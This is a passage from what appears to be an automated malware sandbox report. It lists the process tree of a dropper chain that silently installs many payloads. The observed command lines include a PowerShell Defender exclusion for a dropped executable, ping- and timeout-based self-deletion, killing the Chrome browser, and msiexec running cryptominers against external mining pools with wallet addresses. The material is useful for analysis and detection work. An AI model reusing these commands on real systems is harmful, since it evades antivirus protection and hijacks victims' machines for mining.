        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
        18⤵
        
        PID:9196
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        19⤵
        Runs ping.exe
        
        PID:8072
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"
        17⤵
        
        PID:5012
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jfv4ysmu.zcc\Four.exe & exit
        15⤵
        
        PID:7912
        
        C:\Users\Admin\AppData\Local\Temp\jfv4ysmu.zcc\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfv4ysmu.zcc\Four.exe
        16⤵
        
        PID:5532
        
        C:\Users\Admin\AppData\Local\Temp\MB4FR26QLM\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MB4FR26QLM\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        17⤵
        
        PID:9056
        
        C:\Users\Admin\AppData\Local\Temp\MB4FR26QLM\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MB4FR26QLM\multitimer.exe" 1 3.1617432625.60681031ed54a 104
        18⤵
        
        PID:5228
        
        C:\Users\Admin\AppData\Local\Temp\MB4FR26QLM\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MB4FR26QLM\multitimer.exe" 2 3.1617432625.60681031ed54a
        19⤵
        
        PID:6448
        
        C:\Users\Admin\AppData\Local\Temp\501qjlfb1gx\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\501qjlfb1gx\cpyrix.exe" /VERYSILENT
        20⤵
        
        PID:8208
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        21⤵
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\58b36439-9183-4f1e-9f22-c936dfb960bc\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\58b36439-9183-4f1e-9f22-c936dfb960bc\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\58b36439-9183-4f1e-9f22-c936dfb960bc\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        22⤵
        
        PID:9236
        
        C:\Users\Admin\AppData\Local\Temp\58b36439-9183-4f1e-9f22-c936dfb960bc\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\58b36439-9183-4f1e-9f22-c936dfb960bc\AdvancedRun.exe" /SpecialRun 4101d8 9236
        23⤵
        
        PID:7516
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        22⤵
        
        PID:9964
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        22⤵
        
        PID:9760
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        23⤵
        Delays execution with timeout.exe
        
        PID:6724
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        22⤵
        
        PID:9720
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        22⤵
        
        PID:2672
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        22⤵
        
        PID:9464
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        21⤵
        
        PID:5896
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        22⤵
        
        PID:8344
        
        C:\Users\Admin\AppData\Local\Temp\pugnflnhnm0\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pugnflnhnm0\vict.exe" /VERYSILENT /id=535
        20⤵
        
        PID:5032
        
        C:\Users\Admin\AppData\Local\Temp\is-UC1PL.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UC1PL.tmp\vict.tmp" /SL5="$4086E,870426,780800,C:\Users\Admin\AppData\Local\Temp\pugnflnhnm0\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:7980
        
        C:\Users\Admin\AppData\Local\Temp\is-CBLA1.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-CBLA1.tmp\win1host.exe" 535
        22⤵
        
        PID:3472
        
        C:\Users\Admin\AppData\Local\Temp\xjan1tgsevd\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\xjan1tgsevd\vpn.exe" /silent /subid=482
        20⤵
        
        PID:8516
        
        C:\Users\Admin\AppData\Local\Temp\is-E8810.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-E8810.tmp\vpn.tmp" /SL5="$50594,15170975,270336,C:\Users\Admin\AppData\Local\Temp\xjan1tgsevd\vpn.exe" /silent /subid=482
        21⤵
        
        PID:7384
        
        C:\Users\Admin\AppData\Local\Temp\ie052jvvolp\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ie052jvvolp\Setup3310.exe" /Verysilent /subid=577
        20⤵
        
        PID:8520
        
        C:\Users\Admin\AppData\Local\Temp\is-B09C7.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-B09C7.tmp\Setup3310.tmp" /SL5="$301A6,138429,56832,C:\Users\Admin\AppData\Local\Temp\ie052jvvolp\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:7524
        
        C:\Users\Admin\AppData\Local\Temp\is-MJENU.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-MJENU.tmp\Setup.exe" /Verysilent
        22⤵
        
        PID:6748
        
        C:\Users\Admin\AppData\Local\Temp\iw5acha53rs\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iw5acha53rs\app.exe" /8-23
        20⤵
        Checks computer location settings
        Checks whether UAC is enabled
        Modifies Internet Explorer settings
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\poqum3llo0h\3nemuxfebu3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\poqum3llo0h\3nemuxfebu3.exe" /ustwo INSTALL
        20⤵
        
        PID:5632
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "3nemuxfebu3.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\poqum3llo0h\3nemuxfebu3.exe" & exit
        21⤵
        
        PID:7912
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "3nemuxfebu3.exe" /f
        22⤵
        Kills process with taskkill
        
        PID:7628
        
        C:\Users\Admin\AppData\Local\Temp\3XK72A2Y4O\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3XK72A2Y4O\setups.exe" ll
        17⤵
        
        PID:5408
        
        C:\Users\Admin\AppData\Local\Temp\is-ONFNB.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-ONFNB.tmp\setups.tmp" /SL5="$2073E,635399,250368,C:\Users\Admin\AppData\Local\Temp\3XK72A2Y4O\setups.exe" ll
        18⤵
        
        PID:9184
        
        C:\Users\Admin\AppData\Local\Temp\af-76b4f-285-7329c-8ec05fd312057\Laelonesishae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\af-76b4f-285-7329c-8ec05fd312057\Laelonesishae.exe"
        14⤵
        
        PID:2036
        
        C:\Program Files\Google\RUSHOOOZDK\prolab.exe
        
        "C:\Program Files\Google\RUSHOOOZDK\prolab.exe" /VERYSILENT
        14⤵
        
        PID:2112
        
        C:\Users\Admin\AppData\Local\Temp\is-4U4L8.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-4U4L8.tmp\prolab.tmp" /SL5="$4042A,575243,216576,C:\Program Files\Google\RUSHOOOZDK\prolab.exe" /VERYSILENT
        15⤵
        
        PID:3568
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
        11⤵
        
        PID:5664
        
        C:\Users\Admin\AppData\Local\Temp\is-LU7LB.tmp\lylal220.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-LU7LB.tmp\lylal220.tmp" /SL5="$501E0,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
        12⤵
        
        PID:5808
        
        C:\Users\Admin\AppData\Local\Temp\is-GF6K9.tmp\Microsoft.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-GF6K9.tmp\Microsoft.exe" /S /UID=lylal220
        13⤵
        
        PID:4336
        
        C:\Program Files\Windows Portable Devices\SBESQKRXND\irecord.exe
        
        "C:\Program Files\Windows Portable Devices\SBESQKRXND\irecord.exe" /VERYSILENT
        14⤵
        
        PID:4356
        
        C:\Users\Admin\AppData\Local\Temp\is-358CK.tmp\irecord.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-358CK.tmp\irecord.tmp" /SL5="$30288,6265333,408064,C:\Program Files\Windows Portable Devices\SBESQKRXND\irecord.exe" /VERYSILENT
        15⤵
        
        PID:3904
        
        C:\Users\Admin\AppData\Local\Temp\e9-1fbb0-bc5-879b0-a67aa762bcf2f\Sufulumorae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e9-1fbb0-bc5-879b0-a67aa762bcf2f\Sufulumorae.exe"
        14⤵
        
        PID:4104
        
        C:\Users\Admin\AppData\Local\Temp\f0-a29cc-1da-92592-4eee157b7fdac\Cymupimahae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\f0-a29cc-1da-92592-4eee157b7fdac\Cymupimahae.exe"
        14⤵
        
        PID:196
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\01de0jjq.tr0\md6_6ydj.exe & exit
        15⤵
        
        PID:7052
        
        C:\Users\Admin\AppData\Local\Temp\01de0jjq.tr0\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\01de0jjq.tr0\md6_6ydj.exe
        16⤵
        
        PID:5056
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mwrwx0ml.uzl\askinstall31.exe & exit
        15⤵
        
        PID:6664
        
        C:\Users\Admin\AppData\Local\Temp\mwrwx0ml.uzl\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\mwrwx0ml.uzl\askinstall31.exe
        16⤵
        
        PID:6316
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mpaof4xm.3id\toolspab1.exe & exit
        15⤵
        
        PID:5996
        
        C:\Users\Admin\AppData\Local\Temp\mpaof4xm.3id\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\mpaof4xm.3id\toolspab1.exe
        16⤵
        
        PID:6548
        
        C:\Users\Admin\AppData\Local\Temp\mpaof4xm.3id\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\mpaof4xm.3id\toolspab1.exe
        17⤵
        
        PID:300
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3wsqdics.npr\setup_10.2_mix.exe & exit
        15⤵
        
        PID:1424
        
        C:\Users\Admin\AppData\Local\Temp\3wsqdics.npr\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\3wsqdics.npr\setup_10.2_mix.exe
        16⤵
        
        PID:8064
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xzae0yaw.p0j\GcleanerWW.exe /mixone & exit
        15⤵
        
        PID:6240
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xifffr5q.iym\app.exe /8-2222 & exit
        15⤵
        
        PID:7284
        
        C:\Users\Admin\AppData\Local\Temp\xifffr5q.iym\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\xifffr5q.iym\app.exe /8-2222
        16⤵
        
        PID:7172
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tou4zizk.kle\file.exe & exit
        15⤵
        
        PID:7832
        
        C:\Users\Admin\AppData\Local\Temp\tou4zizk.kle\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\tou4zizk.kle\file.exe
        16⤵
        
        PID:6276
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
        17⤵
        
        PID:5504
        
        C:\Users\Admin\AppData\Local\Temp\DUBMLEWFXA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\DUBMLEWFXA\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        18⤵
        
        PID:8808
        
        C:\Users\Admin\AppData\Local\Temp\DUBMLEWFXA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\DUBMLEWFXA\multitimer.exe" 1 3.1617432615.60681027191c6 101
        19⤵
        
        PID:8196
        
        C:\Users\Admin\AppData\Local\Temp\DUBMLEWFXA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\DUBMLEWFXA\multitimer.exe" 2 3.1617432615.60681027191c6
        20⤵
        
        PID:8972
        
        C:\Users\Admin\AppData\Local\Temp\cbmuskov2n1\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cbmuskov2n1\cpyrix.exe" /VERYSILENT
        21⤵
        
        PID:6688
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        22⤵
        
        PID:4456
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        23⤵
        
        PID:9660
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        22⤵
        
        PID:7792
        
        C:\Users\Admin\AppData\Local\Temp\5b3252d2-bf0e-4e86-8a5c-536d18c24df9\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5b3252d2-bf0e-4e86-8a5c-536d18c24df9\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5b3252d2-bf0e-4e86-8a5c-536d18c24df9\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        23⤵
        
        PID:5652
        
        C:\Users\Admin\AppData\Local\Temp\5b3252d2-bf0e-4e86-8a5c-536d18c24df9\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5b3252d2-bf0e-4e86-8a5c-536d18c24df9\AdvancedRun.exe" /SpecialRun 4101d8 5652
        24⤵
        
        PID:9516
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        23⤵
        
        PID:9940
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        23⤵
        
        PID:9932
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        24⤵
        Delays execution with timeout.exe
        
        PID:8264
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        23⤵
        
        PID:9868
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        23⤵
        
        PID:8928
        
        C:\Users\Admin\AppData\Local\Temp\zui3vpk4w1g\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\zui3vpk4w1g\vpn.exe" /silent /subid=482
        21⤵
        
        PID:8912
        
        C:\Users\Admin\AppData\Local\Temp\is-R7H9E.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-R7H9E.tmp\vpn.tmp" /SL5="$40532,15170975,270336,C:\Users\Admin\AppData\Local\Temp\zui3vpk4w1g\vpn.exe" /silent /subid=482
        22⤵
        
        PID:4432
        
        C:\Users\Admin\AppData\Local\Temp\n3xczhaeijb\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\n3xczhaeijb\app.exe" /8-23
        21⤵
        
        PID:4816
        
        C:\Users\Admin\AppData\Local\Temp\4asrchmyt3u\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4asrchmyt3u\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:1236
        
        C:\Users\Admin\AppData\Local\Temp\is-IVQO1.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IVQO1.tmp\Setup3310.tmp" /SL5="$40592,138429,56832,C:\Users\Admin\AppData\Local\Temp\4asrchmyt3u\Setup3310.exe" /Verysilent /subid=577
        22⤵
        
        PID:9120
        
        C:\Users\Admin\AppData\Local\Temp\is-Q2V2N.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-Q2V2N.tmp\Setup.exe" /Verysilent
        23⤵
        
        PID:2684
        
        C:\Users\Admin\AppData\Local\Temp\wzge32hxd1n\vromk0iloz1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzge32hxd1n\vromk0iloz1.exe" /ustwo INSTALL
        21⤵
        
        PID:4452
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "vromk0iloz1.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\wzge32hxd1n\vromk0iloz1.exe" & exit
        22⤵
        
        PID:9612
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "vromk0iloz1.exe" /f
        23⤵
        Kills process with taskkill
        
        PID:9800
        
        C:\Users\Admin\AppData\Local\Temp\yavp5rayetv\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\yavp5rayetv\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:9080
        
        C:\Users\Admin\AppData\Local\Temp\is-3LM6T.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-3LM6T.tmp\vict.tmp" /SL5="$4058C,870426,780800,C:\Users\Admin\AppData\Local\Temp\yavp5rayetv\vict.exe" /VERYSILENT /id=535
        22⤵
        
        PID:6088
        
        C:\Users\Admin\AppData\Local\Temp\is-81O5G.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-81O5G.tmp\win1host.exe" 535
        23⤵
        
        PID:7028
        
        C:\Users\Admin\AppData\Local\Temp\B0QRWLLOV0\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\B0QRWLLOV0\setups.exe" ll
        18⤵
        
        PID:8216
        
        C:\Users\Admin\AppData\Local\Temp\is-ET8JQ.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-ET8JQ.tmp\setups.tmp" /SL5="$40556,635399,250368,C:\Users\Admin\AppData\Local\Temp\B0QRWLLOV0\setups.exe" ll
        19⤵
        
        PID:8676
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"
        17⤵
        
        PID:8456
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        18⤵
        
        PID:9100
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        19⤵
        Kills process with taskkill
        
        PID:7328
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"
        17⤵
        
        PID:9104
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        18⤵
        
        PID:5880
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        19⤵
        
        PID:6416
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        17⤵
        
        PID:6912
        
        C:\Users\Admin\AppData\Roaming\5C4C.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\5C4C.tmp.exe"
        18⤵
        
        PID:4604
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        19⤵
        
        PID:4020
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        19⤵
        
        PID:6656
        
        C:\Users\Admin\AppData\Roaming\5D95.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\5D95.tmp.exe"
        18⤵
        
        PID:5560
        
        C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\5D95.tmp.exe
        19⤵
        
        PID:7364
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        20⤵
        Delays execution with timeout.exe
        
        PID:5352
        
        C:\Users\Admin\AppData\Roaming\37EB.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\37EB.tmp.exe"
        18⤵
        
        PID:2340
        
        C:\Users\Admin\AppData\Roaming\37EB.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\37EB.tmp.exe"
        19⤵
        
        PID:7616
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        18⤵
        
        PID:6152
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        19⤵
        Runs ping.exe
        
        PID:9880
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"
        17⤵
        
        PID:8648
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bufv3mzx.o2n\Four.exe & exit
        15⤵
        
        PID:8052
        
        C:\Users\Admin\AppData\Local\Temp\bufv3mzx.o2n\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\bufv3mzx.o2n\Four.exe
        16⤵
        
        PID:4664
        
        C:\Users\Admin\AppData\Local\Temp\MMHI0EPUXF\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MMHI0EPUXF\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        17⤵
        
        PID:8280
        
        C:\Users\Admin\AppData\Local\Temp\MMHI0EPUXF\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MMHI0EPUXF\multitimer.exe" 1 3.1617432612.606810248a3db 104
        18⤵
        
        PID:4748
        
        C:\Users\Admin\AppData\Local\Temp\MMHI0EPUXF\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MMHI0EPUXF\multitimer.exe" 2 3.1617432612.606810248a3db
        19⤵
        
        PID:9020
        
        C:\Users\Admin\AppData\Local\Temp\tygpkkyu44o\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tygpkkyu44o\Setup3310.exe" /Verysilent /subid=577
        20⤵
        
        PID:5192
        
        C:\Users\Admin\AppData\Local\Temp\is-POFVP.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-POFVP.tmp\Setup3310.tmp" /SL5="$50134,138429,56832,C:\Users\Admin\AppData\Local\Temp\tygpkkyu44o\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:7436
        
        C:\Users\Admin\AppData\Local\Temp\is-3O7IK.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-3O7IK.tmp\Setup.exe" /Verysilent
        22⤵
        
        PID:4416
        
        C:\Users\Admin\AppData\Local\Temp\pykmtxcyv5z\sovfflxlgtf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pykmtxcyv5z\sovfflxlgtf.exe" /ustwo INSTALL
        20⤵
        
        PID:5568
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "sovfflxlgtf.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\pykmtxcyv5z\sovfflxlgtf.exe" & exit
        21⤵
        
        PID:4472
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "sovfflxlgtf.exe" /f
        22⤵
        Kills process with taskkill
        
        PID:8428
        
        C:\Users\Admin\AppData\Local\Temp\p2o4toavhkt\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\p2o4toavhkt\vict.exe" /VERYSILENT /id=535
        20⤵
        
        PID:6668
        
        C:\Users\Admin\AppData\Local\Temp\is-OLP9V.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OLP9V.tmp\vict.tmp" /SL5="$30592,870426,780800,C:\Users\Admin\AppData\Local\Temp\p2o4toavhkt\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:5816
        
        C:\Users\Admin\AppData\Local\Temp\is-RDB0J.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-RDB0J.tmp\win1host.exe" 535
        22⤵
        
        PID:8336
        
        C:\Users\Admin\AppData\Local\Temp\w45gyd5tvry\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\w45gyd5tvry\cpyrix.exe" /VERYSILENT
        20⤵
        
        PID:7368
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        21⤵
        
        PID:4940
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        22⤵
        
        PID:8332
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        22⤵
        
        PID:9540
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        22⤵
        
        PID:9688
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        21⤵
        
        PID:5112
        
        C:\Users\Admin\AppData\Local\Temp\48b31c34-3424-4246-9149-2cf77c70766a\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\48b31c34-3424-4246-9149-2cf77c70766a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\48b31c34-3424-4246-9149-2cf77c70766a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        22⤵
        
        PID:2000
        
        C:\Users\Admin\AppData\Local\Temp\48b31c34-3424-4246-9149-2cf77c70766a\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\48b31c34-3424-4246-9149-2cf77c70766a\AdvancedRun.exe" /SpecialRun 4101d8 2000
        23⤵
        
        PID:9056
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        22⤵
        
        PID:7368
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        22⤵
        
        PID:6688
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        23⤵
        Delays execution with timeout.exe
        
        PID:9752
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        22⤵
        
        PID:4808
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 1112
        22⤵
        Program crash
        
        PID:7908
        
        C:\Users\Admin\AppData\Local\Temp\h5ar5v1sliu\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\h5ar5v1sliu\app.exe" /8-23
        20⤵
        
        PID:5996
        
        C:\Users\Admin\AppData\Local\Temp\jcconqudzz0\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jcconqudzz0\vpn.exe" /silent /subid=482
        20⤵
        
        PID:7816
        
        C:\Users\Admin\AppData\Local\Temp\is-UC6IA.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UC6IA.tmp\vpn.tmp" /SL5="$1081C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\jcconqudzz0\vpn.exe" /silent /subid=482
        21⤵
        
        PID:7752
        
        C:\Users\Admin\AppData\Local\Temp\RBHOF1H54J\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RBHOF1H54J\setups.exe" ll
        17⤵
        
        PID:8704
        
        C:\Users\Admin\AppData\Local\Temp\is-N5QSN.tmp\setups.tmp
        
